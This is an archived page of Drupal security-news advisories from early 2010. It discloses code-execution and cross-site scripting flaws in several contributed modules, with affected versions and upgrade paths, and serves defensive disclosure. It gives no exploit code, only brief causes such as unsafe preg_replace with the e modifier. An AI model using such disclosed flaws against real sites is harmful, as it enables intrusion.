Security-news

security-news@drupal.org

1 participants
1782 discussions

SA-CONTRIB-2010-015 - Signwriter - Arbitrary code execution
by security-news＠drupal.org 03 Feb '10

03 Feb '10

* Advisory ID: DRUPAL-SA-CONTRIB-2010-015 * Project: Signwriter (third-party module) * Version: 5.x, 6.x * Date: 2010-February-3 * Security risk: Critical * Exploitable from: Remote * Vulnerability: Arbitrary code execution -------- DESCRIPTION --------------------------------------------------------- The Signwriter module allows the use of TrueType fonts to replace text in headings, blocks, menus and filtered text. This vulnerability allows a remote attacker with the ability to create content using an input filter created with a Signwriter profile to execute arbitrary PHP code on an affected system. The vulnerability exists due to unsafe use of PHP's preg_replace function with the e option, causing the replacement to be executed as PHP code. -------- VERSIONS AFFECTED --------------------------------------------------- * Signwriter for Drupal 5.x prior to 5.x-1.6 * Signwriter for Drupal 6.x prior to 6.x-2.0-beta2 Drupal core is not affected. If you do not use the Signwriter, there is nothing you need to do. -------- SOLUTION ------------------------------------------------------------ Upgrade to the latest version: * If you use Signwriter for Drupal 5.x upgrade to Signwriter 5.x-1.6 [1] * If you use Signwriter for Drupal 6.x upgrade to Signwriter 6.x-2.0-beta2 [2] See also the Signwriter page [3]. -------- REPORTED BY --------------------------------------------------------- * Martin Barbella [4] -------- FIXED BY ------------------------------------------------------------ * Agileware [5], the module maintainer -------- CONTACT ------------------------------------------------------------- The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact [6]. [1] http://drupal.org/node/702978 [2] http://drupal.org/node/702976 [3] http://drupal.org/project/signwriter [4] http://drupal.org/user/633600 [5] http://drupal.org/user/89106 [6] http://drupal.org/contact

1 0

SA-CONTRIB-2010-014 - Node Export - Arbitrary code execution
by security-news＠drupal.org 03 Feb '10

03 Feb '10

* Advisory ID: DRUPAL-SA-CONTRIB-2010-014 * Project: Node Export (third-party module) * Version: 5.x, 6.x * Date: 2010-February-3 * Security risk: Less critical * Exploitable from: Remote * Vulnerability: Arbitrary code execution -------- DESCRIPTION --------------------------------------------------------- The Node export module allows users to export and import nodes. Node export does not warn administrators that users with the "access administration pages" permission together with the "import nodes" permission can execute arbitrary PHP statements during the import operation. -------- VERSIONS AFFECTED --------------------------------------------------- * Node Export for Drupal 5.x prior to 5.x-2.3 * Node Export for Drupal 6.x prior to 6.x-2.19 Drupal core is not affected. If you do not use the Node Export module, there is nothing you need to do. -------- SOLUTION ------------------------------------------------------------ Upgrade to the latest version: * If you use Node Export for Drupal 5.x upgrade to Node Export 5.x-2.3 [1] * If you use Node Export for Drupal 6.x upgrade to Node Export 6.x-2.19 [2] Since the "import nodes" permission has been renamed, you will need to grant the permission to import nodes to authorized users again. See also the Node Export page [3]. -------- REPORTED BY --------------------------------------------------------- * mr.baileys [4] of the Drupal Security Team -------- FIXED BY ------------------------------------------------------------ * danielb [5], the module maintainer -------- CONTACT ------------------------------------------------------------- The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact. [1] http://drupal.org/node/703246 [2] http://drupal.org/node/703244 [3] http://drupal.org/project/node_export [4] http://drupal.org/user/383424 [5] http://drupal.org/user/134005

1 0

SA-CONTRIB-2010-013 - Menu Breadcrumb - Cross site scripting
by security-news＠drupal.org 03 Feb '10

03 Feb '10

* Advisory ID: DRUPAL-SA-CONTRIB-2010-013 * Project: Menu Breadcrumb (third-party module) * Version: 6.x * Date: 2010-February-03 * Security risk: Less critical * Exploitable from: Remote * Vulnerability: Cross Site Scripting -------- DESCRIPTION --------------------------------------------------------- The Menu Breadcrumb module allows to use the menu the current page belongs to as breadcrumb. The module does not properly sanitize parts of the provided block, leading to a cross-site scripting (XSS [1]) vulnerability. Such an attack may lead to a malicious user gaining full administrative access. Mitigating factors: A user must have a role with the permission /administer blocks/ to exploit this vulnerability. -------- VERSIONS AFFECTED --------------------------------------------------- * Menu Breadcrumb for Drupal 6.x prior to 6.x-1.3 Drupal core is not affected. If you do not use the contributed Menu Breadcrumb module, there is nothing you need to do. -------- SOLUTION ------------------------------------------------------------ Upgrade to the latest version: * If you use Menu Breadcrumb for Drupal 6.x upgrade to Menu Breadcrumb 6.x-1.3 [2] See also the Menu Breadcrumb project page [3]. -------- REPORTED BY --------------------------------------------------------- * mr.baileys [4] -------- FIXED BY ------------------------------------------------------------ * Chris Burgess [5], the module maintainer -------- CONTACT ------------------------------------------------------------- The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact. [1] http://en.wikipedia.org/wiki/Cross-site_scripting [2] http://drupal.org/node/703010 [3] http://drupal.org/project/menu_breadcrumb [4] http://drupal.org/user/383424 [5] http://drupal.org/user/76026

1 0

SA-CONTRIB-2010-012 - ODF Import - Access Bypass (possible Cross Site Scripting)
by security-news＠drupal.org 03 Feb '10

03 Feb '10

* Advisory ID: DRUPAL-SA-CONTRIB-2010-012 * Project: ODF Import (third-party module) * Version: 6.x-1.0 * Date: 2010-February-3 * Security risk: Moderately critical * Exploitable from: Remote * Vulnerability: Cross Site Scripting -------- DESCRIPTION --------------------------------------------------------- ODF Import module enables users of a Drupal site to import content created in the ODF format (e.g. using OpenOffice.org). When importing content it always used an input format which might not be available to the user importing the content leading to a cross-site scripting (XSS [1]) vulnerability. Such an attack may lead to a malicious user gaining full administrative access. Mitigating factors: this only impacts sites which also use the ODF Import module, where users have the "import odf" permission. -------- VERSIONS AFFECTED --------------------------------------------------- * ODF Import for Drupal 6.x prior to 6.x-1.0 Drupal core is not affected. If you do not use the contributed ODF Import module, there is nothing you need to do. -------- SOLUTION ------------------------------------------------------------ Upgrade to the latest version: * If you use ODF Import for Drupal 6.x upgrade to ODF Import 6.x-1.1 [2] See also the ODF Import project page [3]. -------- REPORTED BY --------------------------------------------------------- * Frederic G. Marand [4] -------- FIXED BY ------------------------------------------------------------ * Vivek Khurana [5], the module maintainer -------- CONTACT ------------------------------------------------------------- The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact. [1] http://en.wikipedia.org/wiki/Cross-site_scripting [2] http://drupal.org/node/702470 [3] http://drupal.org/project/odfimport [4] http://drupal.org/user/27985 [5] http://drupal.org/user/407445

1 0

SA-CONTRIB-2010-011 - Feedback - Cross Site Scripting
by security-news＠drupal.org 27 Jan '10

27 Jan '10

* Advisory ID: DRUPAL-SA-CONTRIB-2010-011 * Project: Feedback (third-party module) * Version: 5.x, 6.x * Date: 2010-January-27 * Security risk: Moderately critical * Exploitable from: Remote * Vulnerability: Cross Site Scripting -------- DESCRIPTION --------------------------------------------------------- Feedback module enables users and visitors of a Drupal site to quickly send feedback messages about the currently displayed page. When displaying reports about submitted feedback, the module does not properly sanitize the user agent strings from the Browscap module before display, leading to a cross-site scripting (XSS [1]) vulnerability. Such an attack may lead to a malicious user gaining full administrative access. Mitigating factors: this only impacts sites which also use the Browscap module and have the "Monitor browsers" feature enabled. -------- VERSIONS AFFECTED --------------------------------------------------- * Feedback for Drupal 6.x prior to 6.x-2.1 * Feedback for Drupal 5.x prior to 5.x-2.1 Drupal core is not affected. If you do not use the contributed Feedback module, there is nothing you need to do. -------- SOLUTION ------------------------------------------------------------ Upgrade to the latest version: * If you use Feedback for Drupal 6.x upgrade to Feedback 6.x-2.1 [2] * If you use Feedback for Drupal 5.x upgrade to Feedback 5.x-2.1 [3] See also the Feedback project page [4]. -------- REPORTED BY --------------------------------------------------------- * mr.baileys [5] -------- FIXED BY ------------------------------------------------------------ * Daniel Kudwien [6], the module maintainer * Dave Reid [7] -------- CONTACT ------------------------------------------------------------- The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact. [1] http://en.wikipedia.org/wiki/Cross-site_scripting [2] http://drupal.org/node/697288 [3] http://drupal.org/node/697290 [4] http://drupal.org/project/feedback [5] http://drupal.org/user/383424 [6] http://drupal.org/user/54136 [7] http://drupal.org/user/53892

1 0

SA-CONTRIB-2010-010 - Author Contact - Cross site scripting
by security-news＠drupal.org 27 Jan '10

27 Jan '10

* Advisory ID: DRUPAL-SA-CONTRIB-2010-010 * Project: Author Contact (third-party module) * Version: 5.x, 6.x * Date: 2010-January-27 * Security risk: Less critical * Exploitable from: Remote * Vulnerability: Cross Site Scripting -------- DESCRIPTION --------------------------------------------------------- The Author Contact module provides a form to contact the author of the current post. The module does not properly sanitize parts of the provided block, leading to a cross-site scripting (XSS [1]) vulnerability. Such an attack may lead to a malicious user gaining full administrative access. A user must have a role with the permission /administer blocks/ to exploit. -------- VERSIONS AFFECTED --------------------------------------------------- * Author Contact for Drupal 6.x prior to 6.x-1.3 * Author Contact for Drupal 5.x prior to 5.x-1.3 Drupal core is not affected. If you do not use the contributed Author Contact module, there is nothing you need to do. -------- SOLUTION ------------------------------------------------------------ Upgrade to the latest version: * If you use Author Contact for Drupal 6.x upgrade to Author Contact 6.x-1.3 [2] * If you use Author Contact for Drupal 5.x upgrade to Author Contact 5.x-1.3 [3] See also the Author Contact project page [4]. -------- REPORTED BY --------------------------------------------------------- * mr.baileys [5] -------- FIXED BY ------------------------------------------------------------ * James Crook [6], the module maintainer * Benjamin Jeavons [7] -------- CONTACT ------------------------------------------------------------- The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact. [1] http://en.wikipedia.org/wiki/Cross-site_scripting [2] http://drupal.org/node/694238 [3] http://drupal.org/node/693896 [4] http://drupal.org/project/authorcontact [5] http://drupal.org/user/383424 [6] http://drupal.org/user/204495 [7] http://drupal.org/user/91990

1 0

SA-CONTRIB-2010-009 - Block Class - Cross Site Scripting
by security-news＠drupal.org 20 Jan '10

20 Jan '10

* Advisory ID: DRUPAL-SA-CONTRIB-2010-009 * Project: Block Class (third-party module) * Version: 6.x-1.2, 5.x-1.1 * Date: 2010-January-20 * Security risk: Less critical * Exploitable from: Remote * Vulnerability: Cross Site Scripting -------- DESCRIPTION --------------------------------------------------------- Block Class module allows users to add classes to any block through the block's configuration interface. This release includes a fix for a cross-site scripting (XSS [1]) vulnerability through which JavaScript could be inserted in the class field of a block's configuration interface. -------- VERSIONS AFFECTED --------------------------------------------------- * Block Class module 5.x-1.1 and prior versions * Block Class module 6.x-1.2 and prior versions Drupal core is not affected. If you do not use the contributed Block Class module, there is nothing you need to do. -------- SOLUTION ------------------------------------------------------------ Install the latest version: * If you use the Block Class module for Drupal 5.x upgrade to Block Class 5.x-1.2 [2] * If you use the Block Class module for Drupal 6.x upgrade to Block Class 6.x-1.3 [3] See also the Block Class [4] page. -------- REPORTED BY --------------------------------------------------------- Didrik Nordström [5] -------- FIXED BY ------------------------------------------------------------ Didrik Nordström [6] and Todd Nienkerk [7]. -------- CONTACT ------------------------------------------------------------- The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact. [1] http://en.wikipedia.org/wiki/Cross-site_scripting [2] http://drupal.org/node/688622 [3] http://drupal.org/node/688624 [4] http://drupal.org/project/block_class [5] http://drupal.org/user/442208 [6] http://drupal.org/user/442208 [7] http://drupal.org/user/92096

1 0

SA-CONTRIB-2010-008 - Recent Comments - Cross Site Scripting
by security-news＠drupal.org 20 Jan '10

20 Jan '10

* Advisory ID: DRUPAL-SA-CONTRIB-2010-008 * Project: Recent Comments (third-party module) * Version: 6.x-1.0, 5.x-1.2 * Date: 2010-January-20 * Security risk: Less Critical * Exploitable from: Remote * Vulnerability: Cross Site Scripting -------- DESCRIPTION --------------------------------------------------------- Recent Comments module provides a high-performance, fully themable block of recent comments. This release includes a fix for a cross-site scripting (XSS [1]) vulnerability in which JavaScript could be inserted in the title of the Recent Comments block via a custom block title interface. This custom title interface has been removed, as Drupal 5.x and later allow overriding the a block's title from its configuration screen. -------- VERSIONS AFFECTED --------------------------------------------------- * Recent Comments module 5.x-1.2 and prior versions * Recent Comments module 6.x-1.0 and prior versions Drupal core is not affected. If you do not use the contributed Recent Comments module, there is nothing you need to do. -------- SOLUTION ------------------------------------------------------------ Install the latest version: * If you use the Recent Comments module for Drupal 5.x upgrade to Recent Comments 5.x-1.3 [2] * If you use the Recent Comments module for Drupal 6.x upgrade to Recent Comments 6.x-1.1 [3] See also the Recent Comments [4] page. -------- REPORTED BY --------------------------------------------------------- Dylan Tack [5] of the Drupal Security Team. -------- FIXED BY ------------------------------------------------------------ Dylan Tack [6] of the Drupal Security Team and Todd Nienkerk [7]. -------- CONTACT ------------------------------------------------------------- The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact. [1] http://en.wikipedia.org/wiki/Cross-site_scripting [2] http://drupal.org/node/688636 [3] http://drupal.org/node/688632 [4] http://drupal.org/project/recent_comments [5] http://drupal.org/user/96647 [6] http://drupal.org/user/96647 [7] http://drupal.org/user/92096

1 0

SA-CONTRIB-2010-007 - Control Panel - Cross Site Scripting
by security-news＠drupal.org 20 Jan '10

20 Jan '10

* Advisory ID: DRUPAL-SA-CONTRIB-2010-007 * Project: Control Panel (third-party module) * Version: 5.x, 6.x * Date: 2010-January-20 * Security risk: Less Critical * Exploitable from: Remote * Vulnerability: Cross Site Scripting -------- DESCRIPTION --------------------------------------------------------- The Control Panel module enables users to add a new graphical control panel page. The module does not sanitize some of the user-supplied data before displaying it, leading to a Cross Site Scripting (XSS [1]) vulnerability. Only users with the 'administer blocks' permission are able to exploit this vulnerability. -------- VERSIONS AFFECTED --------------------------------------------------- * Control Panel module 5.x-1.5 and prior versions * Control Panel module 6.x-1.2 and prior versions Drupal core is not affected. If you do not use the contributed Control Panel [2] module, there is nothing you need to do. -------- SOLUTION ------------------------------------------------------------ The Drupal 5.x version of this module is no longer supported and should be disabled. For Drupal 6.x, install the latest version: * If you use Control Panel module for Drupal 6.x upgrade to Control Panel 6.x-1.3 [3] See also the Control Panel project page [4]. -------- REPORTED BY --------------------------------------------------------- * Reported by Dylan Wilder-Tack [5] of the Drupal Security Team -------- FIXED BY ------------------------------------------------------------ * Dylan Wilder-Tack [6] -------- CONTACT ------------------------------------------------------------- The security team for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact. [1] http://en.wikipedia.org/wiki/Cross-site_scripting [2] http://drupal.org/project/controlpanel [3] http://drupal.org/node/686428 [4] http://drupal.org/project/controlpanel [5] http://drupal.org/user/96647 [6] http://drupal.org/user/96647

1 0

SA-CONTRIB-2010-006 - Bibliography Module - Cross Site Scripting
by security-news＠drupal.org 13 Jan '10

13 Jan '10

* Advisory ID: DRUPAL-SA-CONTRIB-2010-006 * Project: Bibliography (third-party module) * Version: 5.x, 6.x * Date: 2010-January-13 * Security risk: Moderately Critical * Exploitable from: Remote * Vulnerability: Cross Site Scripting -------- DESCRIPTION --------------------------------------------------------- The Bibliography module enables users to manage and display lists of scholarly publications. The module does not sanitize some of the user-supplied data before displaying it, leading to a Cross Site Scripting (XSS [1]) vulnerability. Only users with the 'administer biblio' permission are able to exploit this vulnerability. -------- VERSIONS AFFECTED --------------------------------------------------- * Bibliography module 5.x-1.17 and prior versions * Bibliography module 6.x-1.9 and prior versions Drupal core is not affected. If you do not use the contributed Bibliography [2] module, there is nothing you need to do. -------- SOLUTION ------------------------------------------------------------ Install the latest version: * If you use Bibliography for Drupal 5.x upgrade to Bibliography 5.x-1.18 [3] * If you use Bibliography for Drupal 6.x upgrade to Bibliography 6.x-1.10 [4] See also the Bibliography project page [5]. -------- REPORTED BY --------------------------------------------------------- * grendzy [6] of the Drupal Security Team. -------- FIXED BY ------------------------------------------------------------ Ron Jerome [7], the Bibliography project maintainer. -------- CONTACT ------------------------------------------------------------- The security team for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact. [1] http://en.wikipedia.org/wiki/Cross-site_scripting [2] http://drupal.org/project/biblio [3] http://drupal.org/node/682694 [4] http://drupal.org/node/682696 [5] http://drupal.org/project/biblio [6] http://drupal.org/user/96647 [7] http://drupal.org/user/54997

1 0

Jump to page:

2026

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

Security-news